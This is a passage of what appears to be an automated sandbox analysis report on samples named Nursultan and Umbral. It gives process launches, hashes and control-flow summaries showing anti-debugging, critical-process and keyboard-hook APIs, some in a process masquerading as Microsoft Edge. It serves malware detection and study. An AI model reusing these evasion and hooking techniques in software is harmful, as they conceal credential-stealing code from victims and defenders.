                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x232b7f80000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:19:47:13
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:19:47:14
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:116
                                      Start time:19:47:22
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:130
                                      Start time:19:47:24
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:142
                                      Start time:19:47:26
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:333
                                      Start time:19:47:50
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:347
                                      Start time:19:47:52
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:444
                                      Start time:19:48:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7e52b0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:751
                                      Start time:19:48:47
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13866dcede637a52b81f521c8796acb64d151a3d73f9064f4fd76af356551bd6
                                        • Instruction ID: 66a3802f42a41c8c15fe4eb6dfb5e12c34ce7cf8b3fcd5883c7e8888e6f0fbf4
                                        • Opcode Fuzzy Hash: 13866dcede637a52b81f521c8796acb64d151a3d73f9064f4fd76af356551bd6
                                        • Instruction Fuzzy Hash: 26D19130A189298FDB98FB28D458ABE77E2FF58351F540679D41AE31D2DF34AC118744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: e012fa9b75f6faa4f2bb161de752eedb70d2e46c4cd50a805380aa2d58cae38f
                                        • Instruction ID: 12fb6417ea676bdbfe4ef2830fcb556bb9c7993780adf14e2bedd9924bc07466
                                        • Opcode Fuzzy Hash: e012fa9b75f6faa4f2bb161de752eedb70d2e46c4cd50a805380aa2d58cae38f
                                        • Instruction Fuzzy Hash: 8C413A61E0DED29FE259B77818191A9BBD0FF62360F4C41BBC058670D3DF2978168395
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da2b70e614015181e9f566d1494d0cd115fc2945f543e1b4254723559a606b9d
                                        • Instruction ID: eb8a9e4d95f2a92968e5d97c3c064fc90f6fbe4bdb86bd1ade537efb26cf6893
                                        • Opcode Fuzzy Hash: da2b70e614015181e9f566d1494d0cd115fc2945f543e1b4254723559a606b9d
                                        • Instruction Fuzzy Hash: 8BB12461E1CA855FE399EB3C58593B8BBD1FF98290F8801BAD40DD3283DF39A8458355
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f78902269b3b8c7e5ded9bb255f71dbf487fd386fe147a856c49abd85572164
                                        • Instruction ID: 9a80186e6334542cf7785af2900a9046c98808d9d05cf743d0e035086ee4a464
                                        • Opcode Fuzzy Hash: 3f78902269b3b8c7e5ded9bb255f71dbf487fd386fe147a856c49abd85572164
                                        • Instruction Fuzzy Hash: 03A11460E1CA495FE789EB3C54593B9BBD2FF98390F480179D40ED3282DF38A8418355
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22a0ebc37b4ca071c9bf23c69e6443d2b029137dada6f4dd762d277614b12f92
                                        • Instruction ID: 9a6fcd868f3696ba24c7d8e1a51dc9c2d1108cdb73ff1e60639bf1b1f5e6f50a
                                        • Opcode Fuzzy Hash: 22a0ebc37b4ca071c9bf23c69e6443d2b029137dada6f4dd762d277614b12f92
                                        • Instruction Fuzzy Hash: E6E06D12F1D8590BEBA8B56D64952B863C2EBDC661B40123AD00DD338AEE295C824641
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1bd60b3234640efa12fb05322fe6827c9ee573cbb6afcf4c510d0e4174105480
                                        • Instruction ID: a8df2c0fffceced0fa026cd1bb01691ca0b205b574d809ead6e02f5b2f6e5fa9
                                        • Opcode Fuzzy Hash: 1bd60b3234640efa12fb05322fe6827c9ee573cbb6afcf4c510d0e4174105480
                                        • Instruction Fuzzy Hash: 12E0CD20718D250BDB88F5185441DBD77C1E7C4390F440464F40DD3285DF1CAA8143D5
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fa31dfbc4e1e2ac00da8e7b96f5a7885eb9e9b029412ed8f66651d57545fdce
                                        • Instruction ID: 035bbab40cb49c03d28306c937a9f82888f741ab0e5d138dc02e1c7f6b1800a7
                                        • Opcode Fuzzy Hash: 5fa31dfbc4e1e2ac00da8e7b96f5a7885eb9e9b029412ed8f66651d57545fdce
                                        • Instruction Fuzzy Hash: B1D17D30A1891D8FDB98FB68D458ABA73E2FF58351F144679E42AD32D2DF34AC518740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CN_^
                                        • API String ID: 0-3949952865
                                        • Opcode ID: 95711f3a38ce87936b03257d58466db44da2c05036434b4fcef3d67f0daba067
                                        • Instruction ID: f5330a3c76d6cefe9af2dd0e4b494d8d35ae3fb6303a13ab9d0161bd325bd3ab
                                        • Opcode Fuzzy Hash: 95711f3a38ce87936b03257d58466db44da2c05036434b4fcef3d67f0daba067
                                        • Instruction Fuzzy Hash: ED41C961E0D9C29FF259B7B858191A9BBD0FF627A1F0C41B7C058470D3EF2968168395
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 311f99664b0d4c946ca78fa7106dc9c15d8acf2842f9b02095bd6b522801dcaa
                                        • Instruction ID: e138079d7b839a464f86affebb036c93ab18677ab78e6112ccdaa83d8b3c85a5
                                        • Opcode Fuzzy Hash: 311f99664b0d4c946ca78fa7106dc9c15d8acf2842f9b02095bd6b522801dcaa
                                        • Instruction Fuzzy Hash: D2A1E261E1CA495FE798EB3C98593B9BBD2FF98790F080179D40EC3282DF38A8458755
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f61d35be6b1f151c2bea6c82d3d25cd71ebc991127cfd3691859d372a92bb73f
                                        • Instruction ID: d23f1b801910a5227eb9f7a7c765e442ef1d80470aa644248b7b949511d95924
                                        • Opcode Fuzzy Hash: f61d35be6b1f151c2bea6c82d3d25cd71ebc991127cfd3691859d372a92bb73f
                                        • Instruction Fuzzy Hash: 58E06D02B1D8490BE698B5AC68992B863C2E7DD6A1B50523AD00DC338AED295C824641
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2902e65866311b76aa20c13054760097a77fca54d6785a864e7eba523075012
                                        • Instruction ID: aaab496e018528d51a58a5b048e418da995cf6cf5d5640e6295331a53647bc59
                                        • Opcode Fuzzy Hash: b2902e65866311b76aa20c13054760097a77fca54d6785a864e7eba523075012
                                        • Instruction Fuzzy Hash: 7BE0C220A18D250BEB88FA18A442DBD77C1EB843D0F480468F80DC33C2DE28AA8183D6

                                        Execution Graph

                                        Execution Coverage:27.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:33.3%
                                        Total number of Nodes:9
                                        Total number of Limit Nodes:0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph (rendered graph not recoverable; node data kept): node 434 7ff848e57a81-7ff848e57b3d calls CheckRemoteDebuggerPresent; node 438 7ff848e57b3f; node 439 7ff848e57b45-7ff848e57b88; edges 434->438, 434->439, 438->439
                                        APIs: CheckRemoteDebuggerPresent
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3354395035.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff848e50000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID: CheckDebuggerPresentRemote
                                        • String ID:
                                        • API String ID: 3662101638-0
                                        • Opcode ID: 84b4181721972fe82625927c884fa33c499151eb789346bc50b85e28983d55bb
                                        • Instruction ID: 144fdc651f875ed8e2bbccc1c2b7f8911e42f331bc077911d248f2b7520aacf5
                                        • Opcode Fuzzy Hash: 84b4181721972fe82625927c884fa33c499151eb789346bc50b85e28983d55bb
                                        • Instruction Fuzzy Hash: 30312331908B5C8FCB58DF58C88A7E97BE0FF65321F04426BD489D7292DB34A846CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph (rendered graph not recoverable; node data kept): node 413 7ff848e59c4d-7ff848e59d30 calls RtlSetProcessIsCritical; node 417 7ff848e59d38-7ff848e59d6d; node 418 7ff848e59d32; edges 413->417, 413->418, 418->417
                                        APIs: RtlSetProcessIsCritical
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3354395035.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff848e50000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID: CriticalProcess
                                        • String ID:
                                        • API String ID: 2695349919-0
                                        • Opcode ID: dd207c21b98216e002c95219bd0d58d693c8a3662c93ad57236c7d4f2c9b2a11
                                        • Instruction ID: 65aa9a6fee04d2ed42d263108ba59d59f2a7cbc3d835ca9c1daec9eb6f21a9cd
                                        • Opcode Fuzzy Hash: dd207c21b98216e002c95219bd0d58d693c8a3662c93ad57236c7d4f2c9b2a11
                                        • Instruction Fuzzy Hash: AE41C13180CA588FD719DFA8D845BE9BBF0FF56311F08416EE08AD3692CB746846CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Control-flow graph (rendered graph not recoverable; node data kept): node 420 7ff848e59988-7ff848e5998f; node 421 7ff848e5999a-7ff848e59a0d; node 422 7ff848e59991-7ff848e59999; node 426 7ff848e59a99-7ff848e59a9d; node 427 7ff848e59a13-7ff848e59a20; node 428 7ff848e59a22-7ff848e59a5f calls SetWindowsHookExW; node 430 7ff848e59a67-7ff848e59a98; node 431 7ff848e59a61; edges 420->421, 420->422, 421->426, 421->427, 422->421, 426->428, 427->428, 428->430, 428->431, 431->430
                                        APIs: SetWindowsHookExW
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3354395035.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff848e50000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 129d6362abdbc7bfd0d60f6e9b9422bb4c1002658343bdbfcd4783ca963db5ff
                                        • Instruction ID: 152fc04cbc03dd59f133a459c02667cfca85977840b993eb25c04ed4530e7e3b
                                        • Opcode Fuzzy Hash: 129d6362abdbc7bfd0d60f6e9b9422bb4c1002658343bdbfcd4783ca963db5ff
                                        • Instruction Fuzzy Hash: 6141163091CA4D8FDB59EB6898466F9BBE1FB59321F00023EE00DC3292CB74A8028781
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd6b32403bf3da7a01d1d4570e50d711024a80bf60c26e07156c70825c803e9a
                                        • Instruction ID: 096e3986634900ccc259dc0d2f8a114839d3ad0a35e0754563751e3b9627e2de
                                        • Opcode Fuzzy Hash: bd6b32403bf3da7a01d1d4570e50d711024a80bf60c26e07156c70825c803e9a
                                        • Instruction Fuzzy Hash: 72D1D530A189298FDB98FB28C458ABD77E2FF58354F544279E42AE31D2CF34AC418744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 1f0ade93ed9341b54177c5cc1c7735b50118179cfdec2e3c2226c2ed04fa8ee3
                                        • Instruction ID: 5913b013f0f5078bd894e3fb1e38c99975bc6f263934b837f70d441b7b7f9459
                                        • Opcode Fuzzy Hash: 1f0ade93ed9341b54177c5cc1c7735b50118179cfdec2e3c2226c2ed04fa8ee3
                                        • Instruction Fuzzy Hash: 80412B52E0DDD29FF259B778181A1A9BBD0FF623A0F4C41B7C058760C3DF2978168295
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_L
                                        • API String ID: 0-3936452892
                                        • Opcode ID: e5ac1d5ee576840c103b17a96537da6866de638c002bf29bcd7bf91c3d97f0c3
                                        • Instruction ID: bbc445661f47c1177d4a5085fee90181542586dd4f48fed63c02f7c8306e63e8
                                        • Opcode Fuzzy Hash: e5ac1d5ee576840c103b17a96537da6866de638c002bf29bcd7bf91c3d97f0c3
                                        • Instruction Fuzzy Hash: 7FA11160E2CA495FE799EB3C94593B9BBD2FF98350F884179D00ED3282DF38A8418355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction ID: 485b6199c83ca8ceb02bf715690f9b818022f5e60476d132e234ebaeafca30b4
                                        • Opcode Fuzzy Hash: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction Fuzzy Hash: 54F01C52C4E6D16FE21A667C38710F5BFB0EF02124B0C51B7C0C896093A918A84E8359
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction ID: 7a02864a8aca2250128d72ca61e77142c7596e3d5c90d6112d33fcb1fc8b0149
                                        • Opcode Fuzzy Hash: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction Fuzzy Hash: 75412952E0DED29FF2197679181A1A9BBD0FF62360F4C81B7C058664C3EE2978168295
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92b85ca17b18bc134ca6efb6e6afc1ffe301a94b466a42e4bd70d61a8057b1db
                                        • Instruction ID: 16bfcf589c9b8c5fe29f3043548a984145678fa25c738048020cac4131fd9547
                                        • Opcode Fuzzy Hash: 92b85ca17b18bc134ca6efb6e6afc1ffe301a94b466a42e4bd70d61a8057b1db
                                        • Instruction Fuzzy Hash: 61014512F0DDC90FE7A9F27C28A92B4ABC1FB9A650F4801B6D04CC3297ED2968024351
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79812300e1da68a95fae2d9df223fbec075c85f8b8a9f089bd9572443fad275c
                                        • Instruction ID: dc130f8e05294da509b1879d6034508e64d61e8b021cd2daca633d6ea8060921
                                        • Opcode Fuzzy Hash: 79812300e1da68a95fae2d9df223fbec075c85f8b8a9f089bd9572443fad275c
                                        • Instruction Fuzzy Hash: 77F0C811F1DC990FF6A8B17C64A92B957C2FBEDAA1F840136D40DD328ADD256C424351
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 170e471731350423c7b3f7ad389563a80ef97800da08e7a9457d4490452be868
                                        • Instruction ID: a7e1d780e94ede98dc348473593445c5fa7eb1bf0508f0a9ba06640a9fb1f0e3
                                        • Opcode Fuzzy Hash: 170e471731350423c7b3f7ad389563a80ef97800da08e7a9457d4490452be868
                                        • Instruction Fuzzy Hash: 0AF081A1E0CA610FE744B63858564793FD0FBA4680F48046AD449D7192EE28E9404385
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 184301d5f23e43c5bd7fbe4e2f9d858619c95fad90751754ccf48fa710dc53bc
                                        • Instruction ID: c36285816be13c79eb28eaa4ee5dff179691f97519dffefcb5259a856b48112c
                                        • Opcode Fuzzy Hash: 184301d5f23e43c5bd7fbe4e2f9d858619c95fad90751754ccf48fa710dc53bc
                                        • Instruction Fuzzy Hash: FFD17D30A1891D8FDB98FB68D458ABA73E2FF58351F144679E42AD32D2DF34AC518740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CN_^
                                        • API String ID: 0-3949952865
                                        • Opcode ID: 2704b9e3e0f09d4f903cf140b22a31940e507cf87fd8c77a1eea86268d1fe717
                                        • Instruction ID: 5446ae03c3dbf43d2a6b5662785e54e312407910c742d47e15a3207c7c40cf6c
                                        • Opcode Fuzzy Hash: 2704b9e3e0f09d4f903cf140b22a31940e507cf87fd8c77a1eea86268d1fe717
                                        • Instruction Fuzzy Hash: 9541C761E0DAC29FF259B7B858191A9BBD0FF627A1F0C41BBC058470D3EF296816C395
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 826944cf70458f4792f44240ed5ed306bc605f2cdbc79f19e4f967f4375c49a2
                                        • Instruction ID: ed3b2b81b222e29f6ef2e188fbd29a0352c00721000c5a54c5ac9e43598cde04
                                        • Opcode Fuzzy Hash: 826944cf70458f4792f44240ed5ed306bc605f2cdbc79f19e4f967f4375c49a2
                                        • Instruction Fuzzy Hash: 04A1E161E1CA495FE798EB3C98593B9BBD2FF98790F080179D40ED3282DF38A8418755
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbceffd57c2a56e2bbfc966d23c01b7cc2f4c677419b8700dbd8db9fa4a8ff6f
                                        • Instruction ID: 2fb08316b88d67ce3b16f8ade1d382d50723e9f39709c61ad09e4e11d0ab76ec
                                        • Opcode Fuzzy Hash: cbceffd57c2a56e2bbfc966d23c01b7cc2f4c677419b8700dbd8db9fa4a8ff6f
                                        • Instruction Fuzzy Hash: 13A1D261E1CA895FF798EB3C94593B9BBD2FB98790F08017AD40DC3282DF3898458755
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
